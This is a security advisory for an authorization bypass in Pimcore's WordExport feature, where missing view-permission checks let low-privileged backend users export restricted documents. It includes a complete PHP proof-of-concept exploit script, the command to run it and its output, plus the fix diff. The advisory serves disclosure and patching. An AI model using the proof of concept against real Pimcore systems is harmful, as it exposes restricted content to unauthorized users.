Moderate severityGHSA Advisory· Published May 27, 2026· Updated May 27, 2026

Pimcore has a WordExport Authorization Bypass for Unauthorized Document Export

CVE-2026-45703

Description

Summary

The WordExport export flow only checks whether the current backend user has the feature permission word_export. It does not verify access rights on the target element itself. As a result, a low-privileged backend user can export document content even when the user does not have view permission on that document.

In the local Docker reproduction, a low-privileged user successfully exported sensitive content from a page the user was not allowed to view:

POC-WORDEXPORT-TITLE
POC-WORDEXPORT-DESC

Root

Cause

The controller only performs a feature-level permission check before starting the export flow:

[TranslationController.php](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L41)
TranslationController.php#L44)

It then directly resolves the target element from attacker-controlled type/id input:

[TranslationController.php](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L56)
[TranslationController.php](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L58)

For document-like elements such as Page and Snippet, it renders content in an admin context:

[TranslationController.php](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L72)
TranslationController.php
TranslationController.php

No object-level authorization check such as isAllowed('view') is enforced on the target element.

Affected

Scope

Based on the source code, the following element types may be affected:

page
snippet
email
object

For page-like documents, the pimcore_admin = true rendering context may expose additional backend-visible content.

Preconditions

The attacker is an authenticated backend user
The attacker has the word_export permission
The attacker does not have view permission on the target document

Reproduction

Environment

Reproduction root: pimcore-12.3.3-repro
Standalone PoC script: [poc_wordexport.php](pimcore-12.3.3-repro/tools/poc_wordexport.php)

<?php
declare(strict_types=1);

use Pimcore\Bundle\WordExportBundle\Controller\TranslationController as WordExportController;
use Pimcore\Controller\UserAwareController;
use Pimcore\Model\Document\Page;
use Pimcore\Model\User;
use Pimcore\Security\User\TokenStorageUserResolver;
use Pimcore\Security\User\User as SecurityUser;
use Pimcore\Serializer\Serializer as PimcoreSerializer;
use Pimcore\Tool\Authentication;
use Symfony\Component\DependencyInjection\ContainerInterface;
use Symfony\Component\Filesystem\Filesystem;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\RequestStack;
use Symfony\Component\Security\Core\Authentication\Token\UsernamePasswordToken;
use Symfony\Component\Security\Core\Authentication\Token\Storage\TokenStorage;

require dirname(__DIR__) . '/vendor/autoload.php';

define('PIMCORE_PROJECT_ROOT', dirname(__DIR__));

try {
    \Pimcore\Bootstrap::bootstrap();

    $kernel = new \App\Kernel('dev', true);
    \Pimcore::setKernel($kernel);
    $kernel->boot();

    $container = $kernel->getContainer();

    /** @var RequestStack $requestStack */
    $requestStack = getService($container, [
        RequestStack::class,
        'request_stack',
    ]);

    $admin = User::getByName('admin');
    if (!$admin instanceof User) {
        fail('admin user is missing');
    }

    $auditor = User::getByName('auditor_wordexport');
    if (!$auditor instanceof User) {
        $auditor = new User();
        $auditor->setParentId(0);
        $auditor->setName('auditor_wordexport');
    }

    $auditor->setAdmin(false);
    $auditor->setActive(true);
    $auditor->setPassword(Authentication::getPasswordHash('auditor_wordexport', 'auditor-pass'));
    $auditor->setPermissions(['word_export']);
    $auditor->setRoles([]);
    $auditor->setWorkspacesDocument([]);
    $auditor->setWorkspacesAsset([]);
    $auditor->setWorkspacesObject([]);
    $auditor->save();

    $page = Page::getByPath('/poc-wordexport-secret-page');
    if (!$page instanceof Page) {
        $page = new Page();
        $page->setParentId(1);
        $page->setKey('poc-wordexport-secret-page');
    }

    $page->setPublished(true);
    $page->setController('App\\Controller\\DefaultController::defaultAction');
    $page->setTemplate('default/default.html.twig');
    $page->setTitle('POC-WORDEXPORT-TITLE');
    $page->setDescription('POC-WORDEXPORT-DESC');
    $page->setProperty('language', 'text', 'en', false, true);
    $page->setUserOwner($admin->getId());
    $page->setUserModification($admin->getId());
    $page->save();

    $canViewPage = $page->getDao()->isAllowed('view', $auditor);

    $tokenResolver = buildTokenResolver($auditor);
    $controller = wireController(new WordExportController(), $container, $tokenResolver);

    $exportId = 'wordexportpoc1';
    $exportRequest = new Request([], [
        'id' => $exportId,
        'data' => json_encode([
            ['type' => 'document', 'id' => $page->getId()],
        ], JSON_THROW_ON_ERROR),
        'source' => 'en',
    ]);

    $requestStack->push($exportRequest);
    $controller->wordExportAction($exportRequest, new Filesystem());
    $requestStack->pop();

    $downloadRequest = new Request(['id' => $exportId]);
    $requestStack->push($downloadRequest);
    $downloadResponse = $controller->wordExportDownloadAction($downloadRequest);
    $requestStack->pop();

    $wordContent = (string) $downloadResponse->getContent();

    echo json_encode([
        'vulnerability' => 'wordexport_authorization_bypass',
        'user' => [
            'id' => $auditor->getId(),
            'name' => $auditor->getName(),
            'permissions' => $auditor->getPermissions(),
        ],
        'target_page' => [
            'id' => $page->getId(),
            'path' => $page->getFullPath(),
            'title' => $page->getTitle(),
            'description' => $page->getDescription(),
            'user_can_view_page' => $canViewPage,
        ],
        'result' => [
            'download_contains_title' => str_contains($wordContent, 'POC-WORDEXPORT-TITLE'),
            'download_contains_description' => str_contains($wordContent, 'POC-WORDEXPORT-DESC'),
        ],
    ], JSON_PRETTY_PRINT | JSON_UNESCAPED_SLASHES), PHP_EOL;
} catch (Throwable $e) {
    fail(sprintf(
        '%s: %s in %s:%d%s',
        $e::class,
        $e->getMessage(),
        $e->getFile(),
        $e->getLine(),
        $e->getTraceAsString() ? PHP_EOL . $e->getTraceAsString() : ''
    ));
}

function wireController(
    UserAwareController $controller,
    ContainerInterface $container,
    TokenStorageUserResolver $tokenResolver
): UserAwareController
{
    $controller->setContainer($container);
    $controller->setTokenResolver($tokenResolver);

    if (method_exists($controller, 'setPimcoreSerializer')) {
        /** @var PimcoreSerializer $serializer */
        $serializer = getService($container, [
            PimcoreSerializer::class,
            'Pimcore\\Serializer\\Serializer',
        ]);
        $controller->setPimcoreSerializer($serializer);
    }

    return $controller;
}

function buildTokenResolver(User $user): TokenStorageUserResolver
{
    $tokenStorage = new TokenStorage();
    $proxyUser = new SecurityUser($user);
    $token = new UsernamePasswordToken($proxyUser, 'pimcore_admin', $proxyUser->getRoles());
    $tokenStorage->setToken($token);

    return new TokenStorageUserResolver($tokenStorage);
}

function getService(ContainerInterface $container, array $ids): mixed
{
    foreach ($ids as $id) {
        try {
            if ($container->has($id)) {
                return $container->get($id);
            }
        } catch (Throwable) {
        }
    }

    fail('Unable to resolve service: ' . implode(', ', $ids));
}

function fail(string $message): never
{
    fwrite(STDERR, $message . PHP_EOL);
    exit(1);
}

Reproduction

Steps

1. Create a low-privileged user named auditor_wordexport with only the word_export permission and no document workspace permissions. 2. Create a test page at /poc-wordexport-secret-page containing sensitive values: - title = POC-WORDEXPORT-TITLE - description = POC-WORDEXPORT-DESC 3. Verify that the user does not have view permission on that page. 4. Execute wordExportAction() and wordExportDownloadAction() as that user. 5. Check whether the exported HTML contains the sensitive values.

Reproduction command:

cd pimcore-12.3.3-repro
docker compose exec -T php php tools/poc_wordexport.php

Reproduction

Result

Relevant PoC output:

{
  "vulnerability": "wordexport_authorization_bypass",
  "user": {
    "name": "auditor_wordexport",
    "permissions": [
      "word_export"
    ]
  },
  "target_page": {
    "path": "/poc-wordexport-secret-page",
    "title": "POC-WORDEXPORT-TITLE",
    "description": "POC-WORDEXPORT-DESC",
    "user_can_view_page": false
  },
  "result": {
    "download_contains_title": true,
    "download_contains_description": true
  }
}

This shows that:

The user cannot view the target page
The exported file still contains the page's sensitive content

This confirms that the issue is practically exploitable.

Security

Impact

Unauthorized disclosure of structured page fields
Unauthorized export of restricted backend content
Potential exposure of unpublished or otherwise restricted content
Lateral data access by low-privileged backend accounts

Remediation

Perform object-level authorization immediately after resolving the element from type/id.
Require at least view permission on the target element.
Apply consistent authorization checks across page, snippet, email, and object.
Bind export creation and export download to the requesting user or an equivalent authorization context.
Add regression tests to ensure that users with word_export but without element view permission cannot export content.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

WordExport bundle in Pimcore fails to check view permissions on target documents, allowing low-privileged users to export sensitive content.

Vulnerability

The WordExport export flow in Pimcore's WordExportBundle only checks whether the current backend user has the feature permission word_export. It does not verify access rights on the target element itself. The controller TranslationController resolves the element from attacker-controlled type and id parameters without calling isAllowed('view') [1][2]. For document-like elements such as Page and Snippet, content is rendered in an admin context (pimcore_admin = true), potentially exposing backend-visible data. Affected versions are those prior to the fix in commit 0ce2232 [4].

Exploitation

An attacker needs a low-privileged backend user account that has the word_export feature permission. The attacker can craft a request to the word export endpoint with arbitrary type and id parameters pointing to a document they are not allowed to view. The controller will export the document content without performing an object-level authorization check [1][2]. In a local Docker reproduction, a low-privileged user successfully exported sensitive content from a page they were not permitted to view, including POC-WORDEXPORT-TITLE and POC-WORDEXPORT-DESC [1].

Impact

The attacker gains unauthorized access to document content, including titles, descriptions, and other backend-visible information. This is an information disclosure vulnerability that compromises the confidentiality of restricted documents. The admin rendering context may expose additional sensitive data that would not be visible to the user through normal UI interactions [1][2].

Mitigation

The fix is implemented in commit 0ce2232 (PR #19112), which adds a permission check $element->isAllowed('view') before exporting [4]. Users should update to a version containing this fix. If immediate update is not possible, consider disabling the WordExport bundle or restricting the word_export feature permission to trusted users only. No workaround is provided in the available references.

References

AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package	Affected versions	Patched versions
pimcore/pimcorePackagist	< 12.3.7	12.3.7

Affected products

Pimcore/PimcoreGHSA2 versions
<= 12.3.6+ 1 more
- (no CPE)range: <= 12.3.6
- (no CPE)range: <=12.3.3

Patches

0ce2232b6f92

[Security]: Add permission check for view access in Word Export TranslationController (#19112)

https://github.com/pimcore/pimcoreJiaJia JiMay 7, 2026via ghsa-ref

commit PR #19112

1 file changed · +8 −7

bundles/WordExportBundle/src/Controller/TranslationController.php+8 −7 modified

@@ -58,16 +58,17 @@ public function wordExportAction(Request $request, Filesystem $filesystem): Json
                 $element = \Pimcore\Model\Element\Service::getElementById($el['type'], $el['id']);
                 $output = '';
 
-                // check supported types (subtypes)
-                if (!in_array($element->getType(), ['page', 'snippet', 'email', 'object'])) {
+                // check supported types (subtypes) and if user has view permission
+                if (
+                    !in_array($element?->getType(), ['page', 'snippet', 'email', 'object'], true) ||
+                    !$element->isAllowed('view')
+                ) {
                     continue;
                 }
 
-                if ($element instanceof ElementInterface) {
-                    $output .= '<h1 class="element-headline">' . ucfirst(
-                        $element->getType()
-                    ) . ' - ' . $element->getRealFullPath() . ' (ID: ' . $element->getId() . ')</h1>';
-                }
+                $output .= '<h1 class="element-headline">' . ucfirst(
+                    $element->getType()
+                ) . ' - ' . $element->getRealFullPath() . ' (ID: ' . $element->getId() . ')</h1>';
 
                 if ($element instanceof PageSnippet) {
                     if ($element instanceof Page) {

Vulnerability mechanics

Root cause

"Missing object-level authorization check — the controller only verifies the feature permission `word_export` but never calls `isAllowed('view')` on the target element before exporting its content."

Attack vector

An authenticated backend user who holds the `word_export` feature permission but lacks `view` permission on a target document can exploit this by sending a crafted request to `wordExportAction` with the target element's type and ID [ref_id=1][ref_id=2]. The controller resolves the element and renders its content in an admin context (`pimcore_admin = true`) without calling `isAllowed('view')`, so the exported Word document includes sensitive fields such as title and description that the user should not be able to access [ref_id=1]. The attacker then retrieves the generated export via `wordExportDownloadAction`.

Affected code

The vulnerable code is in `bundles/WordExportBundle/src/Controller/TranslationController.php` within the `wordExportAction` method. The controller resolves the target element from attacker-controlled `type`/`id` input via `\Pimcore\Model\Element\Service::getElementById()` and then checks only the element's subtype (e.g. `page`, `snippet`) without verifying the current user's `view` permission on that element [ref_id=1][ref_id=2].

What the fix does

The patch in commit `0ce2232b6f92c79d0ac244e95e21f55c37456ef1` modifies the condition in `wordExportAction` to add `!$element->isAllowed('view')` alongside the existing subtype check [patch_id=2792871][ref_id=3]. If the current user does not have `view` permission on the element, the element is skipped via `continue`, preventing unauthorized export. The patch also uses the nullsafe operator `$element?->getType()` to safely handle cases where `getElementById` returns null [patch_id=2792871].

Preconditions

authAttacker must be an authenticated backend user of the Pimcore application
configAttacker must have the word_export feature permission assigned to their user account
configAttacker must not have view permission on the target document element
inputAttacker must know or be able to guess the type and ID of the target element

Reproduction

1. Create a low-privileged backend user named `auditor_wordexport` with only the `word_export` permission and no document workspace permissions. 2. Create a test page at `/poc-wordexport-secret-page` containing sensitive values (e.g. `title = POC-WORDEXPORT-TITLE`, `description = POC-WORDEXPORT-DESC`). 3. Verify that the user does not have `view` permission on that page. 4. Execute `wordExportAction()` and `wordExportDownloadAction()` as that user using the PoC script at `pimcore-12.3.3-repro/tools/poc_wordexport.php`. 5. Check whether the exported HTML contains the sensitive values. Reproduction command: `cd pimcore-12.3.3-repro && docker compose exec -T php php tools/poc_wordexport.php` [ref_id=1][ref_id=2].

Generated on May 27, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

News mentions

No linked articles in our index yet.

cvss	0.260
epss	0.000
exploit	0.000
kev	0.000
patch	-0.070
ransomware	0.000